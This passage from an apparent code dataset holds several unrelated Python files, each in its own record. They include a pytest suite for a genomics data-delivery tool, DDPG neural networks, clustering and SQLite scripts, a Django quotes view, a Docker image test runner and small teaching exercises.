'name': 'p2sample%s',\n 'samples': {\n 'project_id': 'project2',\n 'user_sample_id': 'p2_user_s_id%s',\n 'species_name': 'Homo sapiens',\n 'useable': 'yes',\n 'required_yield': 120000000000,\n 'required_coverage': 30,\n 'aggregated': {\n 'clean_reads': 39024000,\n 'yield_in_gb': 127,\n 'yield_q30_in_gb': 102,\n 'pc_q30': 85.2,\n 'pc_mapped_reads': 99.1,\n 'pc_duplicate_reads': 16.4,\n },\n 'coverage': {'mean': 35},\n },\n 'lims/samples': {\n '2D Barcode': 'Fluidx%s',\n 'Delivery': 'split',\n 'Total DNA(ng)': 2000\n },\n 'lims/status/sample_status': {\n 'library_type': 'nano',\n 'started_date': '2017-08-02T11:25:14.659000'\n },\n 'run_elements': [\n {\n 'run_element_id': 'run1_el_s%s_id3',\n 'clean_reads': 15,\n 'run_id': 'run1',\n 'project_id': 'project2',\n 'lane': 3,\n 'useable': 'yes'\n },\n {\n 'run_element_id': 'run1_el_s%s_id4',\n 'clean_reads': 15,\n 'run_id': 'run1',\n 'project_id': 'project1',\n 'lane': 4,\n 'useable': 'yes'\n }\n ]\n }\n}\n\n\ndef _get_value(value_template, index):\n \"\"\"\n Take a template and complete it with the index if the template contains %s.\n If the template is an iterable (but not a string or dict) then it takes the next one and complete the template.\n \"\"\"\n if not (type(value_template) in [str, dict]) and isinstance(value_template, collections.Iterable):\n value_template = next(value_template)\n if isinstance(value_template, str) and '%s' in value_template:\n return value_template % index\n else:\n return value_template\n\n\nrest_responses = {'samples': {}, 'lims/samples': {}, 'lims/status/sample_status': {}, 'run_elements': {}}\nfake_processes = {}\nfor process in sample_templates:\n artifacts = []\n for i in range(1, sample_templates[process].get('nb_sample', 2) + 1):\n sample_id = sample_templates[process]['name'] % i\n if i not in sample_templates[process].get('already_delivered_samples', []):\n artifacts.append(Mock(samples=[NamedMock(name=sample_id)]))\n\n for endpoint in ('samples', 'lims/samples', 'lims/status/sample_status'):\n rest_responses[endpoint][sample_id] = dict([\n (k, _get_value(v, i)) for k, v in sample_templates[process].get(endpoint, {}).items()\n ])\n rest_responses[endpoint][sample_id]['sample_id'] = sample_id\n rest_responses['run_elements'][sample_id] = []\n for re_template in sample_templates[process].get('run_elements', []):\n re = dict((k, _get_value(v, i)) for k, v in re_template.items())\n re['sample_id'] = sample_id\n rest_responses['run_elements'][sample_id].append(re)\n\n fake_processes[process] = Mock(\n type=NamedMock(name=d.release_trigger_lims_step_name),\n all_inputs=Mock(return_value=artifacts)\n )\n\n\ndef fake_get_document(*args, **kwargs):\n match = kwargs.get('where') or kwargs['match']\n if 'sample_id' in match:\n return rest_responses.get(args[0], {}).get(match['sample_id'])\n if 'project_id' in match:\n return [rr for rr in rest_responses.get(args[0], {}).values() if rr['project_id'] == match['project_id']]\n\n\npatch_get_document = patch('egcg_core.rest_communication.get_document', side_effect=fake_get_document)\npatch_get_documents = patch('egcg_core.rest_communication.get_documents', side_effect=fake_get_document)\npatch_get_queue = patch('egcg_core.clarity.get_queue_uri', return_value='http://testclarity.com/queue/999')\n\n\nclass FakeProcessPropertyMock(PropertyMock):\n \"\"\"PropertyMock specifically to return fake processes.\"\"\"\n def __get__(self, obj, obj_type):\n return fake_processes.get(obj.process_id)\n\n\npatch_process = patch.object(d.DataDelivery, 'process', new=FakeProcessPropertyMock())\n\n\ndef touch(f, content=None):\n with open(f, 'w') as open_file:\n if content:\n open_file.write(content)\n\n\ndef create_fake_fastq_fastqc_md5_from_commands(instance):\n \"\"\"\n This function replaces run_aggregate_commands and take an instance of DataDelivery.\n It will create the output as if the command were run.\n It only supports fastqc and command that redirects there outputs\n \"\"\"\n for commands in instance.all_commands_for_cluster:\n for command in commands.split(';'):\n if len(command.split('>')) > 1:\n output = command.split('>')[1].strip()\n if output.endswith('.md5'):\n touch(output, 'd41d8cd98f00b204e9800998ecf8427e ' + os.path.basename(output))\n else:\n touch(output)\n elif command.strip().startswith('fastqc'):\n touch(command.split()[-1].split('.fastq')[0] + '_fastqc.zip')\n touch(command.split()[-1].split('.fastq')[0] + '_fastqc.html')\n\n\nclass TestDataDelivery(TestProjectManagement):\n config_file = 'example_data_delivery.yaml'\n assets_delivery = os.path.join(TestProjectManagement.assets_path, 'data_delivery')\n analysis_exts = ['.bam', '.bam.bai', '.bam.bai.md5', '.bam.md5', '.g.vcf.gz', '.g.vcf.gz.md5', '.g.vcf.gz.tbi',\n '.g.vcf.gz.tbi.md5', '.vcf.gz', '.vcf.gz.md5', '.vcf.gz.tbi', '.vcf.gz.tbi.md5']\n raw_data_exts = ['_R1.fastq.gz', '_R1.fastq.gz.md5', '_R1_fastqc.html', '_R1_fastqc.zip', '_R2.fastq.gz',\n '_R2.fastq.gz.md5', '_R2_fastqc.html', '_R2_fastqc.zip']\n final_files_split = ['p2_user_s_id1' + ext for ext in analysis_exts] + ['raw_data']\n final_files_merged = ['p1_user_s_id1' + ext for ext in analysis_exts + raw_data_exts]\n final_files_merged2 = ['p1_user_s_id2' + ext for ext in analysis_exts + raw_data_exts]\n final_files_merged_no_raw = ['p1_user_s_id1' + ext for ext in analysis_exts]\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.dest_dir = cfg['delivery']['dest']\n\n def setUp(self):\n os.makedirs(self.dest_dir, exist_ok=True)\n staging_dir = os.path.join(self.assets_delivery, 'staging')\n self.delivery_dry_split_fluidx = d.DataDelivery(dry_run=True, work_dir=staging_dir, process_id='process_id2', no_cleanup=True, email=False)\n self.delivery_real_split_fluidx = d.DataDelivery(dry_run=False, work_dir=staging_dir, process_id='process_id2', email=False)\n self.delivery_dry_merged = d.DataDelivery(dry_run=True, work_dir=staging_dir, process_id='process_id1', no_cleanup=True, email=False)\n self.delivery_real_merged = d.DataDelivery(dry_run=False, work_dir=staging_dir, process_id='process_id1', email=False)\n\n self._create_run_elements(itertools.chain.from_iterable(rest_responses['run_elements'].values()))\n self._create_analysed_sample_files(rest_responses['samples'].values())\n\n def tearDown(self):\n for directory in [self.delivery_dry_split_fluidx.staging_dir, self.delivery_dry_merged.staging_dir]:\n if os.path.exists(directory):\n shutil.rmtree(directory)\n\n for directory in [\n self.dest_dir,\n os.path.join(self.assets_delivery, 'source'),\n os.path.join(self.assets_delivery, 'runs')\n ]:\n for d in os.listdir(directory):\n shutil.rmtree(os.path.join(directory, d))\n\n def _create_run_elements(self, list_run_elements):\n for e in list_run_elements:\n sample_dir = os.path.join(self.assets_delivery, 'runs', e['run_id'], e['project_id'], e['sample_id'])\n os.makedirs(sample_dir, exist_ok=True)\n for t in [\n 'S1_L00%s_R1.fastq.gz', 'S1_L00%s_R2.fastq.gz',\n 'S1_L00%s_R1_fastqc.html', 'S1_L00%s_R2_fastqc.html',\n 'S1_L00%s_R1_fastqc.zip', 'S1_L00%s_R2_fastqc.zip'\n ]:\n open(os.path.join(sample_dir, t % e['lane']), 'w').close()\n self.md5(os.path.join(sample_dir, t % e['lane']))\n\n def _create_analysed_sample_files(self, list_samples):\n for s in list_samples:\n sample_dir = os.path.join(self.assets_delivery, 'source', s['project_id'], s['sample_id'])\n os.makedirs(sample_dir, exist_ok=True)\n for t in ['%s.bam', '%s.bam.bai', '%s.g.vcf.gz', '%s.g.vcf.gz.tbi', '%s.vcf.gz', '%s.vcf.gz.tbi']:\n f = os.path.join(sample_dir, t % s['user_sample_id'])\n open(f, 'w').close()\n self.md5(f)\n\n def test_mark_samples_as_released(self):\n delivered_date = datetime.datetime(2018, 1, 10)\n with patch('bin.deliver_reviewed_data._now', return_value=delivered_date), \\\n patch('egcg_core.rest_communication.patch_entry') as mpatch, \\\n patch('egcg_core.clarity.route_samples_to_workflow_stage') as mroute:\n self.delivery_real_merged.samples2files = {\n 'p1sample1': [{'file_path': 'path to file1'}],\n 'p1sample2': [{'file_path': 'path to file2'}],\n }\n self.delivery_real_merged.mark_samples_as_released(['p1sample1', 'p1sample2'])\n mpatch.assert_any_call(\n 'samples', element_id='p1sample1', id_field='sample_id',\n payload={\n 'delivered': 'yes',\n 'files_delivered': [{'file_path': 'path to file1'}],\n 'delivery_date': delivered_date\n },\n update_lists=['files_delivered']\n )\n mpatch.assert_called_with(\n 'samples', element_id='p1sample2', id_field='sample_id',\n payload={\n 'delivered': 'yes',\n 'files_delivered': [{'file_path': 'path to file2'}],\n 'delivery_date': delivered_date\n },\n update_lists=['files_delivered']\n )\n mroute.assert_called_with(\n ['p1sample1', 'p1sample2'],\n 'Data Release workflow',\n stage_name='Data Release stage'\n )\n\n def test_deliverable_samples(self):\n with patch_process, patch_get_document, patch_get_documents:\n project_to_samples = self.delivery_dry_merged.deliverable_samples\n assert list(project_to_samples) == ['project1']\n assert [sample['sample_id'] for samples in project_to_samples.values() for sample in samples] == ['p1sample1', 'p1sample2']\n\n def test_summarise_metrics_per_sample(self):\n with patch_process, patch_get_document, patch_get_documents:\n _ = self.delivery_dry_merged.deliverable_samples\n expected_header = ['Project', 'Sample Id', 'User sample id', 'Species', 'Library type', 'Received date',\n 'DNA QC (ng)', 'Number of Read pair', 'Target Yield', 'Yield', 'Yield Q30', '%Q30',\n 'Mapped reads rate', 'Duplicate rate', 'Target Coverage', 'Mean coverage',\n 'Delivery folder']\n\n expected_lines = [\n 'project1\\tp1sample1\\tp1_user_s_id1\\tHomo sapiens\\tTruSeq PCR-Free\\t2017-08-02\\t2000\\t39024000\\t'\n '120.0\\t127\\t102\\t85.2\\t99.1\\t16.4\\t30\\t35\\tdate_delivery',\n 'project1\\tp1sample2\\tp1_user_s_id2\\tHomo sapiens\\tTruSeq PCR-Free\\t2017-08-02\\t2000\\t39024000\\t'\n '120.0\\t127\\t102\\t85.2\\t99.1\\t16.4\\t30\\t35\\tdate_delivery'\n ]\n header, lines = self.delivery_dry_merged.summarise_metrics_per_sample(\n project_id='project1',\n delivery_folder='date_delivery'\n )\n assert header == expected_header\n assert sorted(lines) == sorted(expected_lines)\n\n def test_overwrite_metrics_file(self):\n os.makedirs(os.path.join(self.dest_dir, 'project1'), exist_ok=True)\n metrics_lines = [\n 'Project\\tSample Id\\tUser sample id\\tSpecies\\tLibrary type\\tReceived date\\tDNA QC (ng)\\t'\n 'Number of Read pair\\tTarget Yield\\tYield\\tYield Q30\\t%Q30\\tMapped reads rate\\tDuplicate rate\\t'\n 'Target Coverage\\tMean coverage\\tDelivery folder',\n 'project1\\tp1sample3\\tp1_user_s_id1\\tHomo sapiens\\tTruSeq PCR-Free\\t2017-08-02\\t2000\\t39024000\\t'\n '120.0\\t127\\t102\\t85.2\\t99.1\\t16.4\\t30\\t35\\tdate_delivery1',\n 'project1\\tp1sample4\\tp1_user_s_id2\\tHomo sapiens\\tTruSeq PCR-Free\\t2017-08-02\\t2000\\t39024000\\t'\n '120.0\\t127\\t102\\t85.2\\t99.1\\t16.4\\t30\\t35\\tdate_delivery1'\n ]\n summary_file = os.path.join(self.dest_dir, 'project1', 'summary_metrics.csv')\n with open(summary_file, 'w') as open_file:\n open_file.write('\\n'.join(metrics_lines))\n\n with patch_process, patch_get_document, patch_get_documents:\n _ = self.delivery_dry_merged.deliverable_samples\n self.delivery_dry_merged.write_metrics_file(\n project='project1',\n delivery_folder='date_delivery2'\n )\n with open(summary_file, 'r') as open_file:\n lines = open_file.readlines()\n assert len(lines) == 5\n assert lines[1].endswith('date_delivery1\\n')\n assert lines[2].endswith('date_delivery1\\n')\n assert lines[3].endswith('date_delivery2\\n')\n assert lines[4].endswith('date_delivery2\\n')\n\n def test_overwrite_old_metrics_file(self):\n os.makedirs(os.path.join(self.dest_dir, 'project1'), exist_ok=True)\n metrics_lines = [\n 'Project\\tSample Id\\tUser sample id\\tRead pair sequenced\\tYield\\tYield Q30\\tNb reads in bam\\t'\n 'mapping rate\\tproperly mapped reads rate\\tduplicate rate\\tMean coverage\\tDelivery folder',\n 'project1\\tp1sample3\\tp1_user_s_id1\\t39024000\\t127\\t102\\t39823000\\t99.1\\t92.3\\t16.4\\t35\\tdate_delivery1',\n 'project1\\tp1sample4\\tp1_user_s_id2\\t39024000\\t127\\t102\\t39823000\\t99.1\\t92.3\\t16.4\\t35\\tdate_delivery1'\n ]\n summary_file = os.path.join(self.dest_dir, 'project1', 'summary_metrics.csv')\n with open(summary_file, 'w') as open_file:\n open_file.write('\\n'.join(metrics_lines))\n\n with patch_process, patch_get_document, patch_get_documents:\n _ = self.delivery_dry_merged.deliverable_samples\n self.delivery_dry_merged.write_metrics_file(\n project='project1',\n delivery_folder='date_delivery2'\n )\n with open(summary_file, 'r') as open_file:\n lines = open_file.readlines()\n assert len(lines) == 5\n assert lines[1].endswith('date_delivery1\\n')\n assert lines[2].endswith('date_delivery1\\n')\n assert lines[3].endswith('date_delivery2\\n')\n assert lines[4].endswith('date_delivery2\\n')\n\n def test_deliver_data_merged(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue:\n # Remove one of the run_element from rest response so the remaining one gets used as merged\n re = rest_responses['run_elements']['p1sample1'].pop()\n self.delivery_dry_merged.deliver_data()\n assert sorted(os.listdir(self.delivery_dry_merged.staging_dir)) == ['p1sample1', 'p1sample2']\n list_files = sorted(os.listdir(os.path.join(self.delivery_dry_merged.staging_dir, 'p1sample1')))\n assert list_files == sorted(self.final_files_merged)\n # Put it back\n rest_responses['run_elements']['p1sample1'].append(re)\n\n def test_deliver_data_merged_concat(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue:\n self.delivery_dry_merged.deliver_data()\n assert sorted(os.listdir(self.delivery_dry_merged.staging_dir)) == ['p1sample1', 'p1sample2']\n list_files = sorted(os.listdir(os.path.join(self.delivery_dry_merged.staging_dir, 'p1sample1')))\n assert list_files == sorted(self.final_files_merged_no_raw)\n assert len(self.delivery_dry_merged.all_commands_for_cluster) == 4\n\n def test_deliver_data_split(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue:\n self.delivery_dry_split_fluidx.deliver_data()\n assert sorted(os.listdir(self.delivery_dry_split_fluidx.staging_dir)) == ['Fluidx1', 'Fluidx2']\n list_files = os.listdir(os.path.join(self.delivery_dry_split_fluidx.staging_dir, 'Fluidx1'))\n assert sorted(list_files) == sorted(self.final_files_split)\n\n def test_deliver_data_merged_real(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue,\\\n patch('bin.deliver_reviewed_data.DataDelivery.mark_samples_as_released'), \\\n patch.object(d.DataDelivery, 'run_aggregate_commands', new=create_fake_fastq_fastqc_md5_from_commands), \\\n patch.object(d.DataDelivery, 'register_postponed_files'):\n self.delivery_real_merged.deliver_data()\n assert os.listdir(self.dest_dir) == ['project1']\n today = datetime.date.today().isoformat()\n assert sorted(os.listdir(os.path.join(self.dest_dir, 'project1'))) == [today, 'all_md5sums.txt', 'summary_metrics.csv']\n assert sorted(os.listdir(os.path.join(self.dest_dir, 'project1', today))) == ['p1sample1', 'p1sample2']\n assert sorted(self.final_files_merged2) == sorted(os.listdir(os.path.join(self.dest_dir, 'project1', today, 'p1sample2')))\n\n assert self.delivery_real_merged.samples2files['p1sample2'] == [\n {\n 'file_path': 'project1/%s/p1sample2/%s' % (today, f),\n 'size': 0,\n 'md5': 'd41d8cd98f00b204e9800998ecf8427e'\n }\n for f in ('p1_user_s_id2.g.vcf.gz', 'p1_user_s_id2.g.vcf.gz.tbi', 'p1_user_s_id2.vcf.gz',\n 'p1_user_s_id2.vcf.gz.tbi', 'p1_user_s_id2.bam', 'p1_user_s_id2.bam.bai')\n ]\n\n def test_deliver_data_split_real(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue,\\\n patch.object(d.DataDelivery, 'run_aggregate_commands'),\\\n patch('bin.deliver_reviewed_data.DataDelivery.mark_samples_as_released'):\n self.delivery_real_split_fluidx.deliver_data()\n assert os.listdir(self.dest_dir) == ['project2']\n today = datetime.date.today().isoformat()\n assert sorted(os.listdir(os.path.join(self.dest_dir, 'project2'))) == [today, 'all_md5sums.txt', 'summary_metrics.csv']\n assert sorted(os.listdir(os.path.join(self.dest_dir, 'project2', today))) == ['Fluidx1', 'Fluidx2']\n assert sorted(os.listdir(os.path.join(self.dest_dir, 'project2', today, 'Fluidx1'))) == sorted(self.final_files_split)\n\n assert sorted(\n self.delivery_real_split_fluidx.samples2files['p2sample1'],\n key=operator.itemgetter('file_path')\n ) == [\n {\n 'file_path': 'project2/%s/Fluidx1/%s' % (today, f),\n 'size': 0,\n 'md5': 'd41d8cd98f00b204e9800998ecf8427e'\n }\n for f in ['p2_user_s_id1.bam', 'p2_user_s_id1.bam.bai', 'p2_user_s_id1.g.vcf.gz',\n 'p2_user_s_id1.g.vcf.gz.tbi', 'p2_user_s_id1.vcf.gz', 'p2_user_s_id1.vcf.gz.tbi',\n 'raw_data/run1_el_s1_id3_R1.fastq.gz', 'raw_data/run1_el_s1_id3_R2.fastq.gz',\n 'raw_data/run1_el_s1_id4_R1.fastq.gz', 'raw_data/run1_el_s1_id4_R2.fastq.gz']\n\n ]\n\n def test_get_email_data(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue,\\\n patch.object(d.DataDelivery, 'today', new_callable=PropertyMock(return_value='2017-12-15')):\n exp = {\n 'num_samples': 2,\n 'release_batch': '2017-12-15',\n 'delivery_queue': 'http://testclarity.com/queue/999',\n 'project_id': 'test_project'\n }\n assert exp == self.delivery_dry_merged.get_email_data('test_project', ['sample1', 'sample2'])\n\n def test_send_reports(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue,\\\n patch('egcg_core.notifications.email.EmailSender._try_send') as mock_send_email:\n self.delivery_dry_merged.email = True\n _ = self.delivery_dry_merged.deliverable_samples\n self.delivery_dry_merged.send_reports(\n {'project1': [rest_responses['samples']['p1sample1'], rest_responses['samples']['p1sample2']]},\n {'test_project': os.path.join(self.assets_path, 'data_delivery', 'test_project_report.pdf')}\n )\n assert mock_send_email.call_count == 1\n assert type(mock_send_email.call_args_list[0][0][0]) == MIMEMultipart\n\n def test_resolve_process_id(self):\n assert d.resolve_process_id('http://test.com/path/to/step/20198') == '24-20198'\n assert d.resolve_process_id('http://test.com/api/2/steps/24-20198') == '24-20198'\n assert d.resolve_process_id('20198') == '24-20198'\n assert d.resolve_process_id('24-20198') == '24-20198'\n","sub_path":"tests/test_data_delivery.py","file_name":"test_data_delivery.py","file_ext":"py","file_size_in_byte":23486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"256107170","text":"import copy\nimport numpy as np\nimport random\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\ndef hidden_init(layer):\n fan_in = layer.weight.data.size()[0]\n lim = 1. / np.sqrt(fan_in)\n return (-lim, lim)\n\nclass Actor(nn.Module):\n\n def __init__(self, state_size, action_size):\n super(Actor, self).__init__()\n self.seed = torch.manual_seed(seed=0)\n self.fc1 = nn.Linear(state_size, 1024)\n self.fc2 = nn.Linear(1024, 1024)\n self.fc3 = nn.Linear(1024, 512)\n self.fc4 = nn.Linear(512, 128)\n self.fc5 = nn.Linear(128, action_size)\n self.reset_parameters()\n self.to(device)\n\n\n def reset_parameters(self):\n self.fc1.weight.data.uniform_(*hidden_init(self.fc1))\n self.fc2.weight.data.uniform_(*hidden_init(self.fc2))\n self.fc3.weight.data.uniform_(*hidden_init(self.fc3))\n self.fc4.weight.data.uniform_(*hidden_init(self.fc4))\n self.fc5.weight.data.uniform_(-3e-3, 3e-3)\n\n def forward(self, state):\n x = F.leaky_relu(self.fc1(state))\n x = F.leaky_relu(self.fc2(x))\n x = F.leaky_relu(self.fc3(x))\n x = F.leaky_relu(self.fc4(x))\n return F.tanh(self.fc5(x))\n\n\nclass Critic(nn.Module):\n\n def __init__(self, state_size, action_size):\n super(Critic, self).__init__()\n self.seed = torch.manual_seed(seed=0)\n self.fcs1 = nn.Linear(state_size, 1024)\n self.fc2 = nn.Linear(1024 + action_size, 1024)\n self.fc3 = nn.Linear(1024, 1024)\n self.fc4 = nn.Linear(1024, 512)\n self.fc5 = nn.Linear(512, 1)\n self.reset_parameters()\n self.to(device)\n\n def reset_parameters(self):\n self.fcs1.weight.data.uniform_(*hidden_init(self.fcs1))\n self.fc2.weight.data.uniform_(*hidden_init(self.fc2))\n self.fc3.weight.data.uniform_(*hidden_init(self.fc3))\n self.fc4.weight.data.uniform_(*hidden_init(self.fc4))\n self.fc5.weight.data.uniform_(-3e-3, 3e-3)\n\n def forward(self, state, action):\n xs = F.leaky_relu(self.fcs1(state))\n x = torch.cat((xs, action), dim=1)\n x = F.leaky_relu(self.fc2(x))\n x = F.leaky_relu(self.fc3(x))\n x = F.leaky_relu(self.fc4(x))\n return self.fc5(x)\n\n\nclass OUNoise:\n \"\"\"Ornstein-Uhlenbeck process.\"\"\"\n\n def __init__(self, size, mu=0., theta=0.7, sigma=0.1):\n \"\"\"Initialize parameters and noise process.\"\"\"\n self.mu = mu * np.ones(size)\n self.theta = theta\n self.sigma = sigma\n self.reset()\n\n def reset(self):\n \"\"\"Reset the internal state (= noise) to mean (mu).\"\"\"\n self.state = copy.copy(self.mu)\n\n def sample(self):\n \"\"\"Update internal state and return it as a noise sample.\"\"\"\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state","sub_path":"ddpg_nets.py","file_name":"ddpg_nets.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"47849785","text":"# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.cluster import KMeans\n\n# Importing the dataset\ndataset = pd.read_csv(\n '~\\\\BOW_title_1000.tsv'\n , sep = '\\t'\n , encoding='utf-8'\n )\nX = dataset.iloc[:, 11:263].values\n####################################################\n# Kmeans\n# Using the elbow method to find the optimal number of clusters\nwcss = []\nfor i in range(1, 20):\n kmeans = KMeans(n_clusters = i, init = 'k-means++', random_state = 42)\n kmeans.fit(X)\n wcss.append(kmeans.inertia_)\nplt.plot(range(1, 20), wcss)\nplt.title('The Elbow Method')\nplt.xlabel('Number of clusters')\nplt.ylabel('WCSS')\nplt.show()\n\n# Fitting K-Means to the dataset\nkmeans = KMeans(n_clusters = 12, init = 'k-means++', random_state = 42)\ny_data = kmeans.fit_predict(X)\n####################################################\n# HC\n# Using the dendrogram to find the optimal number of clusters\nimport scipy.cluster.hierarchy as sch\ndendrogram = sch.dendrogram(sch.linkage(X, method = 'ward'))\nplt.title('Dendrogram')\nplt.xlabel('BOW')\nplt.ylabel('Euclidean distances')\nplt.show()\n\n# Fitting Hierarchical Clustering to the dataset\nfrom sklearn.cluster import AgglomerativeClustering\nhc = AgglomerativeClustering(n_clusters = 8, affinity = 'euclidean', linkage = 'ward')\ny_data = hc.fit_predict(X)\n####################################################\n# Add clusters to initial dataset\nclusters = np.asarray(y_data)\ndataset['cluster'] = clusters\namazonjobs_df = dataset.iloc[:, 1:11]\namazonjobs_df['cluster'] = clusters\n\n# Export results to tsv\nimport os\namazonjobs_df.to_csv('Results_.tsv', sep='\\t', encoding='utf-8')\nprint('>>>>>> Result exported: ' + f'{os.getcwd()}\\Results_.tsv')\n","sub_path":"clustering_kmeans _hc.py","file_name":"clustering_kmeans _hc.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"133685452","text":"import sqlite3\r\n\r\nconn = sqlite3.connect('example.db')\r\nc = conn.cursor()\r\n\r\nc.execute('CREATE TABLE user (name text, email text)')\r\n\r\nc.execute(\"INSERT INTO user VALUES ('Mike', 'mike@mike.com')\")\r\n\r\nconn.commit()\r\nconn.close()","sub_path":"sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"566526485","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nimport json\n\n# Function will build the json response based on the data provided\ndef build_res(stat, mess, data=None):\n res = {\"quotes\": data, \"status\": stat, \"message\": mess}\n\n return JsonResponse(res, content_type=\"application/json\")\n\n# Quotes route will respond with the quotes provided in the quotes.json file\ndef quotes(request):\n fs = None\n data = None\n str = None\n\n # Attempt to open the file\n try:\n fs = open('/Users/kgluce/Documents/git/punny-foie-gras/quotes.json')\n except:\n return build_res(False, \"Error: Couldn't open quotes.json\")\n\n # Attempt to read the file\n try:\n str = fs.read()\n except:\n fs.close()\n return build_res(False, \"Error: Couldn't read the quotes.json\")\n fs.close()\n\n # Attempt to convert JSON string to python objects\n try:\n data = json.loads(str)[\"quotes\"]\n except:\n return build_res(False, \"Error: Malformed JSON string\")\n\n # Made it! Return the correct data/status\n return build_res(True, \"Success: Loaded JSON data\", data=data)\n\n","sub_path":"punnyBackend/quotes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"340229428","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom subprocess import check_call\nimport sys\nimport os\nimport logging\nimport yaml\nimport click\nimport click_log\nfrom .utils import (\n assert_image_tag_from_dockerfile,\n find_matrix_from_dockerfile,\n gen_version_target_from_tag\n)\n\nlogger = logging.getLogger(__name__)\n\n\n@click.command()\n@click.argument('dockerfile')\n@click_log.simple_verbosity_option()\n@click_log.init(__name__)\ndef test(dockerfile):\n image_tag = assert_image_tag_from_dockerfile(logger, dockerfile)\n matrix_yml_path = find_matrix_from_dockerfile(dockerfile)\n project_dir = os.path.dirname(matrix_yml_path)\n\n if not os.path.exists(matrix_yml_path):\n logger.error('matrix.yml not found in project dir: %s', project_dir)\n sys.exit(1)\n\n # switch to project dir where matrix.yml is located, we assume test files\n # are located relative matrix.yml\n os.chdir(project_dir)\n\n with open(matrix_yml_path) as matrix_fobj:\n matrix = yaml.load(matrix_fobj)\n\n version, target = gen_version_target_from_tag(image_tag)\n if version not in matrix:\n logger.error('version %s not found in matrix.', version)\n sys.exit(1)\n\n version_cfg = matrix[version]\n if target not in version_cfg:\n logger.error('taget %s not found in version %s', target, version)\n sys.exit(1)\n\n target_cfg = version_cfg[target]\n test_script = target_cfg.get('_test')\n if not test_script:\n logger.info('No test found for image %s, skipped.', dockerfile)\n sys.exit(0)\n\n test_script = os.path.abspath(test_script)\n if not os.path.exists(test_script):\n logger.info('Defined test script (%s) not found for image %s.',\n test_script, image_tag)\n sys.exit(1)\n\n logger.info('--------------------------------------------')\n logger.info('[*] Testing image %s with script %s...',\n image_tag, test_script)\n logger.info('--------------------------------------------')\n\n # Spin up a docker container to test the given image. Here, we mount the\n # directory where the test files live into /build_test path inside the\n # container (-v) so the container has access to all test files\n cmds = ['docker', 'run',\n '-v', '%s:/build_test' % os.path.dirname(test_script),\n image_tag,\n 'bash', '-c',\n 'cd /build_test && bash %s' % os.path.basename(test_script)]\n logger.debug('running test docker command: %s', cmds)\n check_call(cmds)\n","sub_path":"floydker/src/floydker/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"507255538","text":"# -*- coding:utf-8 -*-\n# @Desc:\n# @Author: Administrator\n# @Date: 2018-04-29 11:46\n\n# while循环的格式:\n# while 条件:\n# 条件满足时,做的事情1...\n# 条件满足时,做的事情2...\n# 条件满足时,做的事情3...\n\n### 练习:计算1-100的累积和\nnum = 1\nsum = 0\nwhile num <= 100 :\n sum += num\n num += 1\nprint(\"1-100的累积和: %d\"%sum)\n\n\n","sub_path":"01.PythonDoc/02.控制流程语句/02.while循环的用法.py","file_name":"02.while循环的用法.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"332615696","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# liczby 2-3.py\n\n\ndef liczby2():\n \"\"\"\n Drukuje wszystkie liczby dwucyfrowe\n o niepowtarzających się cyfrach\n oraz zwraca ilość takich liczb\n nie drukujemy: 11, 22, 33, 44, itd.\n \"\"\"\n ile = 0 # ilość liczb\n\n for i in range(1, 10): # pętla dziesiątek\n for j in range(0, 10): # pętla jedności\n if i != j:\n print(\"{}{} \".format(i, j), end=\"\")\n ile += 1\n return ile\n\n\ndef liczby3():\n \"\"\"\n Drukuje wszystkie liczby trzycyfrowe\n o niepowtarzających się cyfrach\n oraz zwraca ilość takich liczb\n nie drukujemy: 111, 222, 112, 323, itd.\n \"\"\"\n ile = 0; # ilość liczb\n\n for i in range(1, 10): # pętla setek\n for j in range(0, 10): # pętla dziesiątek\n for k in range(0, 10): # pętla jedności\n if i!=j and i!=k and j!=k:\n print(\"{}{}{} \".format(i, j, k), end=\"\")\n ile += 1\n return ile\n\n\ndef main(args):\n print(\"Liczb 2-cyfrowych:\", liczby2())\n print(\"Liczb 3-cyfrowych:\", liczby3())\n return 0\n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n","sub_path":"python/liczby-23.py","file_name":"liczby-23.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"142734993","text":"import json\nimport decimal\nimport collections\nfrom cxio.cx_constants import CxConstants\n\n\nclass CxWriter(object):\n\n def __init__(self, out):\n if out is None:\n raise AssertionError('output stream must not be none')\n self.__out = out\n self.__pre_meta_data = []\n self.__post_meta_data = []\n self.__aspect_element_counts = {}\n self.__started = False\n self.__ended = False\n self.__fragment_started = False\n self.__first = True\n 